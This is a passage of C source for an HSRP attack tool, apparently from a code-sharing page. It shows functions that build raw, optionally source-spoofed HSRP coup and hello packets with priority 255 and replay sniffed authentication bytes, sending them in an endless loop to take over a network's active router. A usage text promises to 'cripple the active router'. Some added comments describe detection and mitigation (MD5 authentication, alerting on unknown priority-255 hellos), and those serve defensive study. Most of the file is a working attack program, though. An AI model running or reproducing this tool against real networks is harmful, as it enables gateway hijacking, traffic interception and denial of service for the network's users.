
📄 main.c

📁 HSRP攻击程序源码
💻 C
		heada.buf[10] = o->auth[2]; 
		heada.buf[11] = o->auth[3]; 
		heada.buf[12] = o->auth[4]; 
		heada.buf[13] = o->auth[5]; 
		heada.buf[14] = o->auth[6]; 
		heada.buf[15] = o->auth[7]; 

	}
	else{
		//default
		heada.buf[8] = 0x63;//c
		heada.buf[9] = 0x69;//i
		heada.buf[10] = 0x73;//s
		heada.buf[11] = 0x63;//c
		heada.buf[12] = 0x6f;//o
		heada.buf[13] = 0x00;//padding
		heada.buf[14] = 0x00;//padding
		heada.buf[15] = 0x00;//padding
	}
	
	heada.buf[16] = ipp[0]; //virtual ip
	heada.buf[17] = ipp[1]; //virtual ip
	heada.buf[18] = ipp[2]; //virtual ip
	heada.buf[19] = ipp[3]; //virtual ip
	sin.sin_family = AF_INET;
	sin.sin_port = htons(1985);
	sin.sin_addr.s_addr = addr.s_addr; 
	 
	sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
	setsockopt(sock, IPPROTO_IP, IP_HDRINCL, &on, sizeof(on));
	if(sock < 0){
		printf("socket broke\n");
		exit;
	}
	
	heada.ip.check = in_chksum((unsigned short *)&heada.ip, 20);

	sinlen = sizeof(sin);
	if(sendto(sock, &heada, 48, 0, (struct sockaddr *)&sin, sinlen) != 48){
		printf("sendto error\n");
		exit;
	}
	close(sock);
	printf("sent coup packet....\n");
	hello();
}

//more non sniffed stuff
/*
 * hello() - hand-build one HSRP hello datagram and resend it in an endless loop.
 *
 * The packet is assembled in a local struct header (declared outside this
 * view; used here through its .ip, .udp and .buf members) and written to a
 * raw socket with IP_HDRINCL set. Settings come from the globals o and addr,
 * both defined elsewhere in the file. The function never returns normally:
 * the loop only ends when SIGTERM, SIGINT or SIGHUP runs cleanup().
 *
 * What this traffic looks like on the wire (useful when writing detections):
 *   - UDP source and destination port 1985, IP TTL 1
 *   - HSRP opcode 0 (hello), state 0x10 (Active), priority 255, hold time 255
 *   - authentication bytes taken from o->auth, or the default "cisco"
 *   - IP source address optionally replaced by o->spoofed
 *
 * Defensive reading: the 8-byte authentication field travels in clear text,
 * so it gives no protection against a host on the same segment. Keyed (MD5)
 * HSRP authentication and filtering UDP/1985 on ports where no router is
 * attached are the usual mitigations, and an unexpected change of active
 * router or a priority-255 hello from an unknown source is worth alerting on.
 */
void hello()
{	
	int sock, sinlen, delay, on =1;
	struct sockaddr_in sin;
	unsigned char *ipp;
	struct header heada;
	ipp = (unsigned char *) &o->virtualip.s_addr; //byte view of the configured virtual IP
	
	memset(&heada, '\0', sizeof(heada));
	printf("Sending hello messages, press CTRL+C when u had enough\n");
	//IPv4 header, 5 x 32-bit words, no options
	heada.ip.ihl = 5;
	heada.ip.version = 4;
	heada.ip.tos = 0;
	heada.ip.tot_len = htons(40);
	heada.ip.frag_off = 0;
	heada.ip.ttl = 1; //TTL 1 keeps the datagram on the local segment
	heada.ip.protocol = IPPROTO_UDP;
	heada.ip.check = 0; //must be zero while in_chksum() runs below
	if(o->spoofed.s_addr){
		heada.ip.saddr = o->spoofed.s_addr; //caller-supplied source address
	}
	else heada.ip.saddr = 0; //zero source: left for the kernel to fill in
	heada.ip.daddr = addr.s_addr; //destination from the global addr, set outside this view
		
	heada.udp.source = htons(1985);
	heada.udp.dest = htons(1985);
	heada.udp.len = htons(28); //8-byte UDP header + 20 payload bytes written below
	heada.udp.check = 0; //zero means "no UDP checksum", which IPv4 permits
	
	//20 payload bytes, one HSRP field per line
	heada.buf[0] = 0x00; //version
	heada.buf[1] = 0x00; //opcode 0 = hello
	heada.buf[2] = 0x10; //state ACTIVE
	if(o->hellotime) heada.buf[3] = o->hellotime;
	else heada.buf[3] = 0x03; //hello time 3 second default
	heada.buf[4] = 0xff; //holdtime 255
	heada.buf[5] = 0xff; //priority 255, the highest value the one-byte field can hold
	if(o->group) heada.buf[6] = o->group;
	else heada.buf[6] = 0x01; //group
	heada.buf[7] = 0x00; //reserved
	if(*o->auth){
		//authentication string supplied by the caller, copied as 8 raw bytes
		heada.buf[8] = o->auth[0]; 
		heada.buf[9] = o->auth[1]; 
		heada.buf[10] = o->auth[2]; 
		heada.buf[11] = o->auth[3]; 
		heada.buf[12] = o->auth[4]; 
		heada.buf[13] = o->auth[5]; 
		heada.buf[14] = o->auth[6]; 
		heada.buf[15] = o->auth[7]; 

	}
	else{
		//default authentication string "cisco", zero padded to 8 bytes
		heada.buf[8] = 0x63; //c
		heada.buf[9] = 0x69; //i
		heada.buf[10] = 0x73; //s
		heada.buf[11] = 0x63; //c
		heada.buf[12] = 0x6f; //o
		heada.buf[13] = 0x00; //padding
		heada.buf[14] = 0x00; //padding
		heada.buf[15] = 0x00; //padding
	}
	
	heada.buf[16] = ipp[0]; //virtual ip
	heada.buf[17] = ipp[1]; //virtual ip
	heada.buf[18] = ipp[2]; //virtual ip
	heada.buf[19] = ipp[3]; //virtual ip
	sin.sin_family = AF_INET;
	sin.sin_port = htons(1985);
	sin.sin_addr.s_addr = addr.s_addr; 
	 
	heada.ip.check = in_chksum((unsigned short *)&heada.ip, 20); //checksum over the 20-byte IP header only

	sinlen = sizeof(sin);
	//pause between packets matches the advertised hello time
	if(o->hellotime) delay = o->hellotime;
	else delay = 3;
	signal(SIGTERM, cleanup);
	signal(SIGINT, cleanup);
	signal(SIGHUP, cleanup);
	for ( ; ; ){
		sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW); //raw socket, opened and closed once per packet
		// NOTE(review): setsockopt() runs before sock is checked for failure, and its own result is ignored
		setsockopt(sock, IPPROTO_IP, IP_HDRINCL, &on, sizeof(on)); //the IP header above is supplied by this program
		if(sock < 0){
			printf("socket broke\n");
			// NOTE(review): `exit;` only names the function and calls nothing, so control falls through
			exit;
		}
		//48 bytes sent; presumably 20 IP + 8 UDP + 20 payload, confirm against struct header
		if(sendto(sock, &heada, 48, 0, (struct sockaddr *)&sin, sinlen) != 48){
			//short or failed send
			printf("sendto error\n");
			exit; //same no-op as above
		}
		close(sock);
		printf(".");
		sleep(delay);
	}
	printf("\n"); //unreachable: the loop above has no break
}


//Sniffed version of coup
/*
 * sniffedcoup() - send one HSRP coup built from a captured packet, then hand
 * over to sniffedhello().
 *
 * headz points at a previously captured packet (struct header is declared
 * outside this view). Hello time, hold time, group, the 8 authentication
 * bytes and the virtual IP are copied from it unchanged; opcode, state and
 * priority are overwritten with coup / Active / 255. The destination is
 * hard-coded to 224.0.0.2, UDP port 1985, with IP TTL 1.
 *
 * Defensive reading: every value a listener needs, including the
 * authentication string, is taken straight from observed traffic. That is
 * why clear-text HSRP authentication does not protect a segment and keyed
 * (MD5) authentication is the recommended setting. A coup followed by
 * priority-255 hellos from an address that is not a known router is the
 * pattern to look for in captures.
 */
void sniffedcoup(struct header *headz)
{
	int sock, sinlen, on = 1;
	struct sockaddr_in sin;
	unsigned char *ipp;
	struct header heada;
	
	ipp = (unsigned char *) &o->virtualip.s_addr; //assigned but never read in this function
	
	memset(&heada, '\0', sizeof(heada)); //clear heada 
	printf("Sending sniffed coup command to preempt the router\n");
	//IPv4 header, 5 x 32-bit words, no options
	heada.ip.ihl = 5;
	heada.ip.version = 4;
	heada.ip.tos = 0;
	heada.ip.tot_len = htons(40);
	heada.ip.frag_off = 0;
	heada.ip.ttl = 1; //TTL 1 keeps the datagram on the local segment
	heada.ip.protocol = IPPROTO_UDP;
	heada.ip.check = 0; //must be zero while in_chksum() runs below
	if(o->spoofed.s_addr){ 
		heada.ip.saddr = o->spoofed.s_addr; //caller-supplied source address
	}
	else heada.ip.saddr = 0; //zero source: left for the kernel to fill in
	heada.ip.daddr = inet_addr("224.0.0.2"); //use multicast address 
	
	heada.udp.source = htons(1985);
	heada.udp.dest = htons(1985);
	heada.udp.len = htons(28); //8-byte UDP header + 20 payload bytes written below
	heada.udp.check = 0; //zero means "no UDP checksum", which IPv4 permits
	
	heada.buf[0] = 0x00; //version
	heada.buf[1] = 0x01; //opcode 1 = coup
	heada.buf[2] = 0x10; //state ACTIVE
	heada.buf[3] = headz->buf[3]; //hello time, copied from the captured packet
	heada.buf[4] = headz->buf[4]; //hold time, copied from the captured packet
	heada.buf[5] = 0xff; //priority 255
	heada.buf[6] = headz->buf[6]; //group
	heada.buf[7] = 0x00; //reserved
	heada.buf[8] = headz->buf[8]; //8 authentication bytes, copied as captured
	heada.buf[9] = headz->buf[9]; 
	heada.buf[10] = headz->buf[10]; 
	heada.buf[11] = headz->buf[11]; 
	heada.buf[12] = headz->buf[12]; 
	heada.buf[13] = headz->buf[13]; 
	heada.buf[14] = headz->buf[14]; 
	heada.buf[15] = headz->buf[15]; 

	heada.buf[16] = headz->buf[16]; //virtual ip
	heada.buf[17] = headz->buf[17]; //virtual ip
	heada.buf[18] = headz->buf[18]; //virtual ip
	heada.buf[19] = headz->buf[19]; //virtual ip
	sin.sin_family = AF_INET;
	sin.sin_port = htons(1985);
	sin.sin_addr.s_addr = inet_addr("224.0.0.2"); 
	 
	sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
	// NOTE(review): setsockopt() runs before sock is checked for failure, and its own result is ignored
	setsockopt(sock, IPPROTO_IP, IP_HDRINCL, &on, sizeof(on)); //the IP header above is supplied by this program
	if(sock < 0){
		printf("socket broke\n");
		// NOTE(review): `exit;` only names the function and calls nothing, so control falls through
		exit;
	}
	
	heada.ip.check = in_chksum((unsigned short *)&heada.ip, 20); //checksum over the 20-byte IP header only

	sinlen = sizeof(sin);
	//48 bytes sent; presumably 20 IP + 8 UDP + 20 payload, confirm against struct header
	if(sendto(sock, &heada, 48, 0, (struct sockaddr *)&sin, sinlen) != 48){
		printf("sendto error\n");
		exit; //same no-op as above
	}
	close(sock);
	printf("sent sniffed coup packet....\n");
	sniffedhello(headz); //does not return: sniffedhello() loops until a signal arrives
}


//sniffed version of hello
/*
 * sniffedhello() - resend an HSRP hello built from a captured packet, forever.
 *
 * headz points at a previously captured packet (struct header is declared
 * outside this view). Hello time, hold time, group, the 8 authentication
 * bytes and the virtual IP are copied from it; opcode, state and priority are
 * set to hello / Active / 255. Packets go to 224.0.0.2, UDP port 1985, with
 * IP TTL 1, and the pause between them is the captured hello time. The loop
 * only ends when SIGTERM, SIGINT or SIGHUP runs cleanup().
 *
 * Defensive reading: the authentication bytes are replayed exactly as seen
 * on the wire, so clear-text HSRP authentication offers no protection here;
 * keyed (MD5) authentication does. Repeated priority-255 hellos for an
 * existing group from an address that is not a known router are the
 * indicator to alert on.
 */
void sniffedhello(struct header *headz)
{
	int sock;
	struct sockaddr_in sin;
	int sinlen;
	int on = 1; //used in setsockopt
	unsigned char *ipp;
	struct header heada;
	ipp = (unsigned char *) &o->virtualip.s_addr; //assigned but never read in this function
	
	memset(&heada, '\0', sizeof(heada));
	printf("Sending sniffed hello packets, press CTRL+C when u have finished\n");
	//IPv4 header, 5 x 32-bit words, no options
	heada.ip.ihl = 5;
	heada.ip.version = 4;
	heada.ip.tos = 0;
	heada.ip.tot_len = htons(40);
	heada.ip.frag_off = 0;
	heada.ip.ttl = 1; //TTL 1 keeps the datagram on the local segment
	heada.ip.protocol = IPPROTO_UDP;
	heada.ip.check = 0;
	if(o->spoofed.s_addr){
		heada.ip.saddr = o->spoofed.s_addr; //caller-supplied source address
	}
	else heada.ip.saddr = 0; //zero source: left for the kernel to fill in
	heada.ip.daddr = inet_addr("224.0.0.2");//use multicast address 224.0.0.2
	
	heada.udp.source = htons(1985);
	heada.udp.dest = htons(1985);
	heada.udp.len = htons(28); //8-byte UDP header + 20 payload bytes written below
	heada.udp.check = 0; //zero means "no UDP checksum", which IPv4 permits
	
	heada.buf[0] = 0x00; //version
	heada.buf[1] = 0x00; //opcode 0 = hello
	heada.buf[2] = 0x10; //state ACTIVE
	heada.buf[3] = headz->buf[3]; //hello time
	heada.buf[4] = headz->buf[4]; //hold time, copied from the captured packet
	heada.buf[5] = 0xff; //priority 255
	heada.buf[6] = headz->buf[6]; //group
	heada.buf[7] = 0x00; //reserved
	heada.buf[8] = headz->buf[8]; //8 authentication bytes, copied as captured
	heada.buf[9] = headz->buf[9]; 
	heada.buf[10] = headz->buf[10]; 
	heada.buf[11] = headz->buf[11]; 
	heada.buf[12] = headz->buf[12]; 
	heada.buf[13] = headz->buf[13]; 
	heada.buf[14] = headz->buf[14]; 
	heada.buf[15] = headz->buf[15]; 
	
	heada.buf[16] = headz->buf[16]; //virtual ip
	heada.buf[17] = headz->buf[17]; //virtual ip
	heada.buf[18] = headz->buf[18]; //virtual ip
	heada.buf[19] = headz->buf[19]; //virtual ip
	
	sin.sin_family = AF_INET;
	sin.sin_port = htons(1985);
	sin.sin_addr.s_addr = inet_addr("224.0.0.2"); 
	
	signal(SIGTERM, cleanup);
	signal(SIGINT, cleanup);
	signal(SIGHUP, cleanup);
	for( ; ; ){
		
		sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW); //raw socket, opened and closed once per packet
		// NOTE(review): setsockopt() runs before sock is checked for failure, and its own result is ignored
		setsockopt(sock, IPPROTO_IP, IP_HDRINCL, &on, sizeof(on)); //the IP header above is supplied by this program
		if(sock < 0){
			printf("socket broke\n");
			// NOTE(review): `exit;` only names the function and calls nothing, so control falls through
			exit;
		}
	
		heada.ip.check = in_chksum((unsigned short *)&heada.ip, 20); //recomputed on every pass of the loop

		sinlen = sizeof(sin);
		//48 bytes sent; presumably 20 IP + 8 UDP + 20 payload, confirm against struct header
		if(sendto(sock, &heada, 48, 0, (struct sockaddr *)&sin, sinlen) != 48){
			printf("sendto error\n");
			exit; //same no-op as above
		}
		close(sock);
		printf(".");
		sleep(headz->buf[3]); //hello time
	}
}

/*
 * cleanup() - signal handler installed for SIGTERM, SIGINT and SIGHUP by the
 * sending loops; prints a closing message and ends the process with status 0.
 *
 * NOTE(review): stdio output and exit() are not async-signal-safe, so this
 * handler relies on the signal arriving at a benign moment.
 */
void cleanup(int sigio)
{
	(void)sigio; /* the same action is taken for every signal */
	fputs("\nFinished attackin the router.....\n", stdout);
	exit(0);
}
	
//work out IP checksum
/*
 * in_chksum() - 16-bit one's-complement checksum over nbytes bytes at pts.
 *
 * Words are read in host byte order exactly as stored. When nbytes is odd,
 * the last byte is placed in the first byte of a zeroed 16-bit word before
 * being added. Returns the complement of the folded sum, truncated to
 * 16 bits; a length of zero or less yields 0xffff.
 */
unsigned short in_chksum(unsigned short *pts, int nbytes)
{
	long total = 0;

	/* Add up every complete 16-bit word. */
	for (; nbytes > 1; nbytes -= 2) {
		total += *pts++;
	}

	/* One byte left over: widen it into a zero-padded word. */
	if (nbytes == 1) {
		unsigned short tail = 0;

		*(unsigned char *)&tail = *(unsigned char *)pts;
		total += tail;
	}

	/* Fold the carries above bit 15 back into the low 16 bits. */
	total = (total & 0xffff) + (total >> 16);
	total += total >> 16;

	return (unsigned short)~total;
}


//print usage
/*
 * usage() - print the command-line summary to stdout and exit with status 0.
 *
 * progname is substituted into the two example lines. The option list is
 * fixed text, so it is written with fputs(); only the examples need printf().
 */
void usage(char *progname)
{
	static const char options[] =
		"\n-S Sniff the network for all the required values then cripple the active router\n"
		"-C Attempt to cripple the active router by sending fake packets\n"
		"-f <spoofed IP> Send packets with spoofed source IP\n"
		"-h <seconds> How often to send hello packets (default 3 secs)\n"
		"-g <group> group number\n"
		"-v <ip address> Specify virtual IP address\n"
		"-a <Max 8 chars> Authenication string, if non specifed default used\n"
		"-i <NIC> Specify Network Interface Card to sniff\n\n";

	fputs(options, stdout);
	printf("Example: %s -C -h3 -g1 -v 123.123.123.123 -a monkey 224.0.0.2\n", progname);
	printf("Example: %s -S -i eth0 -f 1.2.3.4\n\n", progname);
	exit(0);
}
